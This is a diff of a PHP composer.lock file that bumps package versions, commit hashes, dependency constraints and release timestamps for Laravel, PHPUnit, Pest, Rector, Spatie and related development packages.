             "name": "zbateson/stream-decorators",
-            "version": "2.1.1",
+            "version": "3.0.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/zbateson/stream-decorators.git",
-                "reference": "32a2a62fb0f26313395c996ebd658d33c3f9c4e5"
+                "reference": "0c0e79a8c960055c0e2710357098eedc07e6697a"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/zbateson/stream-decorators/zipball/32a2a62fb0f26313395c996ebd658d33c3f9c4e5",
-                "reference": "32a2a62fb0f26313395c996ebd658d33c3f9c4e5",
+                "url": "https://api.github.com/repos/zbateson/stream-decorators/zipball/0c0e79a8c960055c0e2710357098eedc07e6697a",
+                "reference": "0c0e79a8c960055c0e2710357098eedc07e6697a",
                 "shasum": ""
             },
             "require": {
                 "guzzlehttp/psr7": "^2.5",
-                "php": ">=8.0",
-                "zbateson/mb-wrapper": "^2.0"
+                "php": ">=8.1",
+                "zbateson/mb-wrapper": "^2.0 || ^3.0"
             },
             "require-dev": {
                 "friendsofphp/php-cs-fixer": "*",
                 "phpstan/phpstan": "*",
-                "phpunit/phpunit": "^9.6|^10.0"
+                "phpunit/phpunit": "^10.0 || ^11.0"
             },
             "type": "library",
             "autoload": {
@@ -11704,7 +11708,7 @@
             ],
             "support": {
                 "issues": "https://github.com/zbateson/stream-decorators/issues",
-                "source": "https://github.com/zbateson/stream-decorators/tree/2.1.1"
+                "source": "https://github.com/zbateson/stream-decorators/tree/3.0.0"
             },
             "funding": [
                 {
@@ -11712,7 +11716,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2024-04-29T21:42:39+00:00"
+            "time": "2026-02-13T19:45:34+00:00"
         },
         {
             "name": "zircote/swagger-php",
@@ -13119,16 +13123,16 @@
         },
         {
             "name": "brianium/paratest",
-            "version": "v7.19.0",
+            "version": "v7.19.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/paratestphp/paratest.git",
-                "reference": "7c6c29af7c4b406b49ce0c6b0a3a81d3684474e6"
+                "reference": "66e4f7910cecf67736bccf2b8bd53a2e3eb98bd9"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/paratestphp/paratest/zipball/7c6c29af7c4b406b49ce0c6b0a3a81d3684474e6",
-                "reference": "7c6c29af7c4b406b49ce0c6b0a3a81d3684474e6",
+                "url": "https://api.github.com/repos/paratestphp/paratest/zipball/66e4f7910cecf67736bccf2b8bd53a2e3eb98bd9",
+                "reference": "66e4f7910cecf67736bccf2b8bd53a2e3eb98bd9",
                 "shasum": ""
             },
             "require": {
@@ -13142,9 +13146,9 @@
                 "phpunit/php-code-coverage": "^12.5.3 || ^13.0.1",
                 "phpunit/php-file-iterator": "^6.0.1 || ^7",
                 "phpunit/php-timer": "^8 || ^9",
-                "phpunit/phpunit": "^12.5.9 || ^13",
+                "phpunit/phpunit": "^12.5.14 || ^13.0.5",
                 "sebastian/environment": "^8.0.3 || ^9",
-                "symfony/console": "^7.4.4 || ^8.0.4",
+                "symfony/console": "^7.4.7 || ^8.0.7",
                 "symfony/process": "^7.4.5 || ^8.0.5"
             },
             "require-dev": {
@@ -13152,11 +13156,11 @@
                 "ext-pcntl": "*",
                 "ext-pcov": "*",
                 "ext-posix": "*",
-                "phpstan/phpstan": "^2.1.38",
-                "phpstan/phpstan-deprecation-rules": "^2.0.3",
-                "phpstan/phpstan-phpunit": "^2.0.12",
-                "phpstan/phpstan-strict-rules": "^2.0.8",
-                "symfony/filesystem": "^7.4.0 || ^8.0.1"
+                "phpstan/phpstan": "^2.1.40",
+                "phpstan/phpstan-deprecation-rules": "^2.0.4",
+                "phpstan/phpstan-phpunit": "^2.0.16",
+                "phpstan/phpstan-strict-rules": "^2.0.10",
+                "symfony/filesystem": "^7.4.6 || ^8.0.6"
             },
             "bin": [
                 "bin/paratest",
@@ -13196,7 +13200,7 @@
             ],
             "support": {
                 "issues": "https://github.com/paratestphp/paratest/issues",
-                "source": "https://github.com/paratestphp/paratest/tree/v7.19.0"
+                "source": "https://github.com/paratestphp/paratest/tree/v7.19.2"
             },
             "funding": [
                 {
@@ -13208,7 +13212,7 @@
                     "type": "paypal"
                 }
             ],
-            "time": "2026-02-06T10:53:26+00:00"
+            "time": "2026-03-09T14:33:17+00:00"
         },
         {
             "name": "daverandom/libdns",
@@ -13256,22 +13260,22 @@
         },
         {
             "name": "driftingly/rector-laravel",
-            "version": "2.1.9",
+            "version": "2.2.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/driftingly/rector-laravel.git",
-                "reference": "aee9d4a1d489e7ec484fc79f33137f8ee051b3f7"
+                "reference": "807840ceb09de6764cbfcce0719108d044a459a9"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/driftingly/rector-laravel/zipball/aee9d4a1d489e7ec484fc79f33137f8ee051b3f7",
-                "reference": "aee9d4a1d489e7ec484fc79f33137f8ee051b3f7",
+                "url": "https://api.github.com/repos/driftingly/rector-laravel/zipball/807840ceb09de6764cbfcce0719108d044a459a9",
+                "reference": "807840ceb09de6764cbfcce0719108d044a459a9",
                 "shasum": ""
             },
             "require": {
                 "php": "^7.4 || ^8.0",
                 "rector/rector": "^2.2.7",
-                "webmozart/assert": "^1.11"
+                "webmozart/assert": "^1.11 || ^2.0"
             },
             "type": "rector-extension",
             "autoload": {
@@ -13286,9 +13290,9 @@
             "description": "Rector upgrades rules for Laravel Framework",
             "support": {
                 "issues": "https://github.com/driftingly/rector-laravel/issues",
-                "source": "https://github.com/driftingly/rector-laravel/tree/2.1.9"
+                "source": "https://github.com/driftingly/rector-laravel/tree/2.2.0"
             },
-            "time": "2025-12-25T23:31:36+00:00"
+            "time": "2026-03-19T17:24:38+00:00"
         },
         {
             "name": "fakerphp/faker",
@@ -13596,25 +13600,25 @@
         },
         {
             "name": "laravel/boost",
-            "version": "v2.2.1",
+            "version": "v2.4.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/boost.git",
-                "reference": "e27f1616177377fef95296620530c44a7dda4df9"
+                "reference": "f6241df9fd81a86d79a051851177d4ffe3e28506"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/boost/zipball/e27f1616177377fef95296620530c44a7dda4df9",
-                "reference": "e27f1616177377fef95296620530c44a7dda4df9",
+                "url": "https://api.github.com/repos/laravel/boost/zipball/f6241df9fd81a86d79a051851177d4ffe3e28506",
+                "reference": "f6241df9fd81a86d79a051851177d4ffe3e28506",
                 "shasum": ""
             },
             "require": {
                 "guzzlehttp/guzzle": "^7.9",
-                "illuminate/console": "^11.45.3|^12.41.1",
-                "illuminate/contracts": "^11.45.3|^12.41.1",
-                "illuminate/routing": "^11.45.3|^12.41.1",
-                "illuminate/support": "^11.45.3|^12.41.1",
-                "laravel/mcp": "^0.5.1",
+                "illuminate/console": "^11.45.3|^12.41.1|^13.0",
+                "illuminate/contracts": "^11.45.3|^12.41.1|^13.0",
+                "illuminate/routing": "^11.45.3|^12.41.1|^13.0",
+                "illuminate/support": "^11.45.3|^12.41.1|^13.0",
+                "laravel/mcp": "^0.5.1|^0.6.0",
                 "laravel/prompts": "^0.3.10",
                 "laravel/roster": "^0.5.0",
                 "php": "^8.2"
@@ -13622,7 +13626,7 @@
             "require-dev": {
                 "laravel/pint": "^1.27.0",
                 "mockery/mockery": "^1.6.12",
-                "orchestra/testbench": "^9.15.0|^10.6",
+                "orchestra/testbench": "^9.15.0|^10.6|^11.0",
                 "pestphp/pest": "^2.36.0|^3.8.4|^4.1.5",
                 "phpstan/phpstan": "^2.1.27",
                 "rector/rector": "^2.1"
@@ -13658,20 +13662,20 @@
                 "issues": "https://github.com/laravel/boost/issues",
                 "source": "https://github.com/laravel/boost"
             },
-            "time": "2026-02-25T16:07:36+00:00"
+            "time": "2026-03-25T16:37:40+00:00"
         },
         {
             "name": "laravel/dusk",
-            "version": "v8.3.6",
+            "version": "v8.5.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/dusk.git",
-                "reference": "5c3beee54f91f575f50cadcd7e5d44c80cc9a9aa"
+                "reference": "f9f75666bed46d1ebca13792447be6e753f4e790"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/dusk/zipball/5c3beee54f91f575f50cadcd7e5d44c80cc9a9aa",
-                "reference": "5c3beee54f91f575f50cadcd7e5d44c80cc9a9aa",
+                "url": "https://api.github.com/repos/laravel/dusk/zipball/f9f75666bed46d1ebca13792447be6e753f4e790",
+                "reference": "f9f75666bed46d1ebca13792447be6e753f4e790",
                 "shasum": ""
             },
             "require": {
@@ -13730,22 +13734,22 @@
             ],
             "support": {
                 "issues": "https://github.com/laravel/dusk/issues",
-                "source": "https://github.com/laravel/dusk/tree/v8.3.6"
+                "source": "https://github.com/laravel/dusk/tree/v8.5.0"
             },
-            "time": "2026-02-10T18:14:59+00:00"
+            "time": "2026-03-21T11:50:49+00:00"
         },
         {
             "name": "laravel/mcp",
-            "version": "v0.5.9",
+            "version": "v0.6.4",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/mcp.git",
-                "reference": "39e8da60eb7bce4737c5d868d35a3fe78938c129"
+                "reference": "f822c5eb5beed19adb2e5bfe2f46f8c977ecea42"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/mcp/zipball/39e8da60eb7bce4737c5d868d35a3fe78938c129",
-                "reference": "39e8da60eb7bce4737c5d868d35a3fe78938c129",
+                "url": "https://api.github.com/repos/laravel/mcp/zipball/f822c5eb5beed19adb2e5bfe2f46f8c977ecea42",
+                "reference": "f822c5eb5beed19adb2e5bfe2f46f8c977ecea42",
                 "shasum": ""
             },
             "require": {
@@ -13805,20 +13809,20 @@
                 "issues": "https://github.com/laravel/mcp/issues",
                 "source": "https://github.com/laravel/mcp"
             },
-            "time": "2026-02-17T19:05:53+00:00"
+            "time": "2026-03-19T12:37:13+00:00"
         },
         {
             "name": "laravel/pint",
-            "version": "v1.27.1",
+            "version": "v1.29.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/pint.git",
-                "reference": "54cca2de13790570c7b6f0f94f37896bee4abcb5"
+                "reference": "bdec963f53172c5e36330f3a400604c69bf02d39"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/pint/zipball/54cca2de13790570c7b6f0f94f37896bee4abcb5",
-                "reference": "54cca2de13790570c7b6f0f94f37896bee4abcb5",
+                "url": "https://api.github.com/repos/laravel/pint/zipball/bdec963f53172c5e36330f3a400604c69bf02d39",
+                "reference": "bdec963f53172c5e36330f3a400604c69bf02d39",
                 "shasum": ""
             },
             "require": {
@@ -13829,13 +13833,14 @@
                 "php": "^8.2.0"
             },
             "require-dev": {
-                "friendsofphp/php-cs-fixer": "^3.93.1",
-                "illuminate/view": "^12.51.0",
-                "larastan/larastan": "^3.9.2",
+                "friendsofphp/php-cs-fixer": "^3.94.2",
+                "illuminate/view": "^12.54.1",
+                "larastan/larastan": "^3.9.3",
                 "laravel-zero/framework": "^12.0.5",
                 "mockery/mockery": "^1.6.12",
-                "nunomaduro/termwind": "^2.3.3",
-                "pestphp/pest": "^3.8.5"
+                "nunomaduro/termwind": "^2.4.0",
+                "pestphp/pest": "^3.8.6",
+                "shipfastlabs/agent-detector": "^1.1.0"
             },
             "bin": [
                 "builds/pint"
@@ -13872,20 +13877,20 @@
                 "issues": "https://github.com/laravel/pint/issues",
                 "source": "https://github.com/laravel/pint"
             },
-            "time": "2026-02-10T20:00:20+00:00"
+            "time": "2026-03-12T15:51:39+00:00"
         },
         {
             "name": "laravel/roster",
-            "version": "v0.5.0",
+            "version": "v0.5.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/roster.git",
-                "reference": "56904a78f4d7360c1c490ced7deeebf9aecb8c0e"
+                "reference": "5089de7615f72f78e831590ff9d0435fed0102bb"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/roster/zipball/56904a78f4d7360c1c490ced7deeebf9aecb8c0e",
-                "reference": "56904a78f4d7360c1c490ced7deeebf9aecb8c0e",
+                "url": "https://api.github.com/repos/laravel/roster/zipball/5089de7615f72f78e831590ff9d0435fed0102bb",
+                "reference": "5089de7615f72f78e831590ff9d0435fed0102bb",
                 "shasum": ""
             },
             "require": {
@@ -13933,20 +13938,20 @@
                 "issues": "https://github.com/laravel/roster/issues",
                 "source": "https://github.com/laravel/roster"
             },
-            "time": "2026-02-17T17:33:35+00:00"
+            "time": "2026-03-05T07:58:43+00:00"
         },
         {
             "name": "laravel/telescope",
-            "version": "5.18.0",
+            "version": "v5.19.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/telescope.git",
-                "reference": "8bbc1d839317cef7106cabf028e407416e5a1dad"
+                "reference": "5e95df170d14e03dd74c4b744969cf01f67a050b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/telescope/zipball/8bbc1d839317cef7106cabf028e407416e5a1dad",
-                "reference": "8bbc1d839317cef7106cabf028e407416e5a1dad",
+                "url": "https://api.github.com/repos/laravel/telescope/zipball/5e95df170d14e03dd74c4b744969cf01f67a050b",
+                "reference": "5e95df170d14e03dd74c4b744969cf01f67a050b",
                 "shasum": ""
             },
             "require": {
@@ -13954,8 +13959,8 @@
                 "laravel/framework": "^8.37|^9.0|^10.0|^11.0|^12.0|^13.0",
                 "laravel/sentinel": "^1.0",
                 "php": "^8.0",
-                "symfony/console": "^5.3|^6.0|^7.0",
-                "symfony/var-dumper": "^5.0|^6.0|^7.0"
+                "symfony/console": "^5.3|^6.0|^7.0|^8.0",
+                "symfony/var-dumper": "^5.0|^6.0|^7.0|^8.0"
             },
             "require-dev": {
                 "ext-gd": "*",
@@ -14000,26 +14005,26 @@
             ],
             "support": {
                 "issues": "https://github.com/laravel/telescope/issues",
-                "source": "https://github.com/laravel/telescope/tree/5.18.0"
+                "source": "https://github.com/laravel/telescope/tree/v5.19.0"
             },
-            "time": "2026-02-20T19:55:06+00:00"
+            "time": "2026-03-24T18:37:14+00:00"
         },
         {
             "name": "league/uri-components",
-            "version": "7.8.0",
+            "version": "7.8.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/uri-components.git",
-                "reference": "8b5ffcebcc0842b76eb80964795bd56a8333b2ba"
+                "reference": "848ff9db2f0be06229d6034b7c2e33d41b4fd675"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/uri-components/zipball/8b5ffcebcc0842b76eb80964795bd56a8333b2ba",
-                "reference": "8b5ffcebcc0842b76eb80964795bd56a8333b2ba",
+                "url": "https://api.github.com/repos/thephpleague/uri-components/zipball/848ff9db2f0be06229d6034b7c2e33d41b4fd675",
+                "reference": "848ff9db2f0be06229d6034b7c2e33d41b4fd675",
                 "shasum": ""
             },
             "require": {
-                "league/uri": "^7.8",
+                "league/uri": "^7.8.1",
                 "php": "^8.1"
             },
             "suggest": {
@@ -14078,7 +14083,7 @@
                 "docs": "https://uri.thephpleague.com",
                 "forum": "https://thephpleague.slack.com",
                 "issues": "https://github.com/thephpleague/uri-src/issues",
-                "source": "https://github.com/thephpleague/uri-components/tree/7.8.0"
+                "source": "https://github.com/thephpleague/uri-components/tree/7.8.1"
             },
             "funding": [
                 {
@@ -14086,7 +14091,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-01-14T17:24:56+00:00"
+            "time": "2026-03-15T20:22:25+00:00"
         },
         {
             "name": "mockery/mockery",
@@ -14329,33 +14334,33 @@
         },
         {
             "name": "pestphp/pest",
-            "version": "v4.4.1",
+            "version": "v4.4.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/pestphp/pest.git",
-                "reference": "f96a1b27864b585b0b29b0ee7331176726f7e54a"
+                "reference": "e6ab897594312728ef2e32d586cb4f6780b1b495"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/pestphp/pest/zipball/f96a1b27864b585b0b29b0ee7331176726f7e54a",
-                "reference": "f96a1b27864b585b0b29b0ee7331176726f7e54a",
+                "url": "https://api.github.com/repos/pestphp/pest/zipball/e6ab897594312728ef2e32d586cb4f6780b1b495",
+                "reference": "e6ab897594312728ef2e32d586cb4f6780b1b495",
                 "shasum": ""
             },
             "require": {
-                "brianium/paratest": "^7.19.0",
-                "nunomaduro/collision": "^8.9.0",
+                "brianium/paratest": "^7.19.2",
+                "nunomaduro/collision": "^8.9.1",
                 "nunomaduro/termwind": "^2.4.0",
                 "pestphp/pest-plugin": "^4.0.0",
                 "pestphp/pest-plugin-arch": "^4.0.0",
                 "pestphp/pest-plugin-mutate": "^4.0.1",
                 "pestphp/pest-plugin-profanity": "^4.2.1",
                 "php": "^8.3.0",
-                "phpunit/phpunit": "^12.5.12",
+                "phpunit/phpunit": "^12.5.14",
                 "symfony/process": "^7.4.5|^8.0.5"
             },
             "conflict": {
                 "filp/whoops": "<2.18.3",
-                "phpunit/phpunit": ">12.5.12",
+                "phpunit/phpunit": ">12.5.14",
                 "sebastian/exporter": "<7.0.0",
                 "webmozart/assert": "<1.11.0"
             },
@@ -14363,7 +14368,7 @@
                 "pestphp/pest-dev-tools": "^4.1.0",
                 "pestphp/pest-plugin-browser": "^4.3.0",
                 "pestphp/pest-plugin-type-coverage": "^4.0.3",
-                "psy/psysh": "^0.12.20"
+                "psy/psysh": "^0.12.21"
             },
             "bin": [
                 "bin/pest"
@@ -14429,7 +14434,7 @@
             ],
             "support": {
                 "issues": "https://github.com/pestphp/pest/issues",
-                "source": "https://github.com/pestphp/pest/tree/v4.4.1"
+                "source": "https://github.com/pestphp/pest/tree/v4.4.3"
             },
             "funding": [
                 {
@@ -14441,7 +14446,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-17T15:27:18+00:00"
+            "time": "2026-03-21T13:14:39+00:00"
         },
         {
             "name": "pestphp/pest-plugin",
@@ -15058,11 +15063,11 @@
         },
         {
             "name": "phpstan/phpstan",
-            "version": "2.1.40",
+            "version": "2.1.44",
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/phpstan/phpstan/zipball/9b2c7aeb83a75d8680ea5e7c9b7fca88052b766b",
-                "reference": "9b2c7aeb83a75d8680ea5e7c9b7fca88052b766b",
+                "url": "https://api.github.com/repos/phpstan/phpstan/zipball/4a88c083c668b2c364a425c9b3171b2d9ea5d218",
+                "reference": "4a88c083c668b2c364a425c9b3171b2d9ea5d218",
                 "shasum": ""
             },
             "require": {
@@ -15107,7 +15112,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-23T15:04:35+00:00"
+            "time": "2026-03-25T17:34:21+00:00"
         },
         {
             "name": "phpunit/php-code-coverage",
@@ -15457,16 +15462,16 @@
         },
         {
             "name": "phpunit/phpunit",
-            "version": "12.5.12",
+            "version": "12.5.14",
             "source": {
                 "type": "git",
                 "url": "https://github.com/sebastianbergmann/phpunit.git",
-                "reference": "418e06b3b46b0d54bad749ff4907fc7dfb530199"
+                "reference": "47283cfd98d553edcb1353591f4e255dc1bb61f0"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/sebastianbergmann/phpunit/zipball/418e06b3b46b0d54bad749ff4907fc7dfb530199",
-                "reference": "418e06b3b46b0d54bad749ff4907fc7dfb530199",
+                "url": "https://api.github.com/repos/sebastianbergmann/phpunit/zipball/47283cfd98d553edcb1353591f4e255dc1bb61f0",
+                "reference": "47283cfd98d553edcb1353591f4e255dc1bb61f0",
                 "shasum": ""
             },
             "require": {
@@ -15535,7 +15540,7 @@
             "support": {
                 "issues": "https://github.com/sebastianbergmann/phpunit/issues",
                 "security": "https://github.com/sebastianbergmann/phpunit/security/policy",
-                "source": "https://github.com/sebastianbergmann/phpunit/tree/12.5.12"
+                "source": "https://github.com/sebastianbergmann/phpunit/tree/12.5.14"
             },
             "funding": [
                 {
@@ -15559,25 +15564,25 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-16T08:34:36+00:00"
+            "time": "2026-02-18T12:38:40+00:00"
         },
         {
             "name": "rector/rector",
-            "version": "2.3.8",
+            "version": "2.3.9",
             "source": {
                 "type": "git",
                 "url": "https://github.com/rectorphp/rector.git",
-                "reference": "bbd37aedd8df749916cffa2a947cfc4714d1ba2c"
+                "reference": "917842143fd9f5331a2adefc214b8d7143bd32c4"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/rectorphp/rector/zipball/bbd37aedd8df749916cffa2a947cfc4714d1ba2c",
-                "reference": "bbd37aedd8df749916cffa2a947cfc4714d1ba2c",
+                "url": "https://api.github.com/repos/rectorphp/rector/zipball/917842143fd9f5331a2adefc214b8d7143bd32c4",
+                "reference": "917842143fd9f5331a2adefc214b8d7143bd32c4",
                 "shasum": ""
             },
             "require": {
                 "php": "^7.4|^8.0",
-                "phpstan/phpstan": "^2.1.38"
+                "phpstan/phpstan": "^2.1.40"
             },
             "conflict": {
                 "rector/rector-doctrine": "*",
@@ -15611,7 +15616,7 @@
             ],
             "support": {
                 "issues": "https://github.com/rectorphp/rector/issues",
-                "source": "https://github.com/rectorphp/rector/tree/2.3.8"
+                "source": "https://github.com/rectorphp/rector/tree/2.3.9"
             },
             "funding": [
                 {
@@ -15619,7 +15624,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-22T09:45:50+00:00"
+            "time": "2026-03-16T09:43:55+00:00"
         },
         {
             "name": "revolt/event-loop",
@@ -15981,16 +15986,16 @@
         },
         {
             "name": "sebastian/environment",
-            "version": "8.0.3",
+            "version": "8.0.4",
             "source": {
                 "type": "git",
                 "url": "https://github.com/sebastianbergmann/environment.git",
-                "reference": "24a711b5c916efc6d6e62aa65aa2ec98fef77f68"
+                "reference": "7b8842c2d8e85d0c3a5831236bf5869af6ab2a11"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/sebastianbergmann/environment/zipball/24a711b5c916efc6d6e62aa65aa2ec98fef77f68",
-                "reference": "24a711b5c916efc6d6e62aa65aa2ec98fef77f68",
+                "url": "https://api.github.com/repos/sebastianbergmann/environment/zipball/7b8842c2d8e85d0c3a5831236bf5869af6ab2a11",
+                "reference": "7b8842c2d8e85d0c3a5831236bf5869af6ab2a11",
                 "shasum": ""
             },
             "require": {
@@ -16033,7 +16038,7 @@
             "support": {
                 "issues": "https://github.com/sebastianbergmann/environment/issues",
                 "security": "https://github.com/sebastianbergmann/environment/security/policy",
-                "source": "https://github.com/sebastianbergmann/environment/tree/8.0.3"
+                "source": "https://github.com/sebastianbergmann/environment/tree/8.0.4"
             },
             "funding": [
                 {
@@ -16053,7 +16058,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2025-08-12T14:11:56+00:00"
+            "time": "2026-03-15T07:05:40+00:00"
         },
         {
             "name": "sebastian/exporter",
@@ -16711,26 +16716,26 @@
         },
         {
             "name": "spatie/flare-client-php",
-            "version": "1.10.1",
+            "version": "1.11.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/flare-client-php.git",
-                "reference": "bf1716eb98bd689451b071548ae9e70738dce62f"
+                "reference": "fb3ffb946675dba811fbde9122224db2f84daca9"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/flare-client-php/zipball/bf1716eb98bd689451b071548ae9e70738dce62f",
-                "reference": "bf1716eb98bd689451b071548ae9e70738dce62f",
+                "url": "https://api.github.com/repos/spatie/flare-client-php/zipball/fb3ffb946675dba811fbde9122224db2f84daca9",
+                "reference": "fb3ffb946675dba811fbde9122224db2f84daca9",
                 "shasum": ""
             },
             "require": {
-                "illuminate/pipeline": "^8.0|^9.0|^10.0|^11.0|^12.0",
+                "illuminate/pipeline": "^8.0|^9.0|^10.0|^11.0|^12.0|^13.0",
                 "php": "^8.0",
                 "spatie/backtrace": "^1.6.1",
-                "symfony/http-foundation": "^5.2|^6.0|^7.0",
-                "symfony/mime": "^5.2|^6.0|^7.0",
-                "symfony/process": "^5.2|^6.0|^7.0",
-                "symfony/var-dumper": "^5.2|^6.0|^7.0"
+                "symfony/http-foundation": "^5.2|^6.0|^7.0|^8.0",
+                "symfony/mime": "^5.2|^6.0|^7.0|^8.0",
+                "symfony/process": "^5.2|^6.0|^7.0|^8.0",
+                "symfony/var-dumper": "^5.2|^6.0|^7.0|^8.0"
             },
             "require-dev": {
                 "dms/phpunit-arraysubset-asserts": "^0.5.0",
@@ -16768,7 +16773,7 @@
             ],
             "support": {
                 "issues": "https://github.com/spatie/flare-client-php/issues",
-                "source": "https://github.com/spatie/flare-client-php/tree/1.10.1"
+                "source": "https://github.com/spatie/flare-client-php/tree/1.11.0"
             },
             "funding": [
                 {
@@ -16776,41 +16781,44 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-02-14T13:42:06+00:00"
+            "time": "2026-03-17T08:06:16+00:00"
         },
         {
             "name": "spatie/ignition",
-            "version": "1.15.1",
+            "version": "1.16.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/ignition.git",
-                "reference": "31f314153020aee5af3537e507fef892ffbf8c85"
+                "reference": "b59385bb7aa24dae81bcc15850ebecfda7b40838"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/ignition/zipball/31f314153020aee5af3537e507fef892ffbf8c85",
-                "reference": "31f314153020aee5af3537e507fef892ffbf8c85",
+                "url": "https://api.github.com/repos/spatie/ignition/zipball/b59385bb7aa24dae81bcc15850ebecfda7b40838",
+                "reference": "b59385bb7aa24dae81bcc15850ebecfda7b40838",
                 "shasum": ""
             },
             "require": {
                 "ext-json": "*",
                 "ext-mbstring": "*",
                 "php": "^8.0",
-                "spatie/error-solutions": "^1.0",
-                "spatie/flare-client-php": "^1.7",
-                "symfony/console": "^5.4|^6.0|^7.0",
-                "symfony/var-dumper": "^5.4|^6.0|^7.0"
+                "spatie/backtrace": "^1.7.1",
+                "spatie/error-solutions": "^1.1.2",
+                "spatie/flare-client-php": "^1.9",
+                "symfony/console": "^5.4.42|^6.0|^7.0|^8.0",
+                "symfony/http-foundation": "^5.4.42|^6.0|^7.0|^8.0",
+                "symfony/mime": "^5.4.42|^6.0|^7.0|^8.0",
+                "symfony/var-dumper": "^5.4.42|^6.0|^7.0|^8.0"
             },
             "require-dev": {
-                "illuminate/cache": "^9.52|^10.0|^11.0|^12.0",
+                "illuminate/cache": "^9.52|^10.0|^11.0|^12.0|^13.0",
                 "mockery/mockery": "^1.4",
-                "pestphp/pest": "^1.20|^2.0",
+                "pestphp/pest": "^1.20|^2.0|^3.0",
                 "phpstan/extension-installer": "^1.1",
                 "phpstan/phpstan-deprecation-rules": "^1.0",
                 "phpstan/phpstan-phpunit": "^1.0",
                 "psr/simple-cache-implementation": "*",
-                "symfony/cache": "^5.4|^6.0|^7.0",
-                "symfony/process": "^5.4|^6.0|^7.0",
+                "symfony/cache": "^5.4.38|^6.0|^7.0|^8.0",
+                "symfony/process": "^5.4.35|^6.0|^7.0|^8.0",
                 "vlucas/phpdotenv": "^5.5"
             },
             "suggest": {
@@ -16859,20 +16867,20 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-02-21T14:31:39+00:00"
+            "time": "2026-03-17T10:51:08+00:00"
         },
         {
             "name": "spatie/laravel-ignition",
-            "version": "2.11.0",
+            "version": "2.12.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/laravel-ignition.git",
-                "reference": "11f38d1ff7abc583a61c96bf3c1b03610a69cccd"
+                "reference": "45b3b6e1e73fc161cba2149972698644b99594ee"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/laravel-ignition/zipball/11f38d1ff7abc583a61c96bf3c1b03610a69cccd",
-                "reference": "11f38d1ff7abc583a61c96bf3c1b03610a69cccd",
+                "url": "https://api.github.com/repos/spatie/laravel-ignition/zipball/45b3b6e1e73fc161cba2149972698644b99594ee",
+                "reference": "45b3b6e1e73fc161cba2149972698644b99594ee",
                 "shasum": ""
             },
             "require": {
@@ -16882,7 +16890,7 @@
                 "illuminate/support": "^11.0|^12.0|^13.0",
                 "nesbot/carbon": "^2.72|^3.0",
                 "php": "^8.2",
-                "spatie/ignition": "^1.15.1",
+                "spatie/ignition": "^1.16",
                 "symfony/console": "^7.4|^8.0",
                 "symfony/var-dumper": "^7.4|^8.0"
             },
@@ -16951,7 +16959,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-22T19:14:05+00:00"
+            "time": "2026-03-17T12:20:04+00:00"
         },
         {
             "name": "staabm/side-effects-detector",
@@ -17007,16 +17015,16 @@
         },
         {
             "name": "symfony/http-client",
-            "version": "v7.4.6",
+            "version": "v7.4.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/http-client.git",
-                "reference": "2bde8afd5ab2fe0b05a9c2d4c3c0e28ceb98a154"
+                "reference": "1010624285470eb60e88ed10035102c75b4ea6af"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/http-client/zipball/2bde8afd5ab2fe0b05a9c2d4c3c0e28ceb98a154",
-                "reference": "2bde8afd5ab2fe0b05a9c2d4c3c0e28ceb98a154",
+                "url": "https://api.github.com/repos/symfony/http-client/zipball/1010624285470eb60e88ed10035102c75b4ea6af",
+                "reference": "1010624285470eb60e88ed10035102c75b4ea6af",
                 "shasum": ""
             },
             "require": {
@@ -17084,7 +17092,7 @@
                 "http"
             ],
             "support": {
-                "source": "https://github.com/symfony/http-client/tree/v7.4.6"
+                "source": "https://github.com/symfony/http-client/tree/v7.4.7"
             },
             "funding": [
                 {
@@ -17104,7 +17112,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-18T09:46:18+00:00"
+            "time": "2026-03-05T11:16:58+00:00"
         },
         {
             "name": "symfony/http-client-contracts",

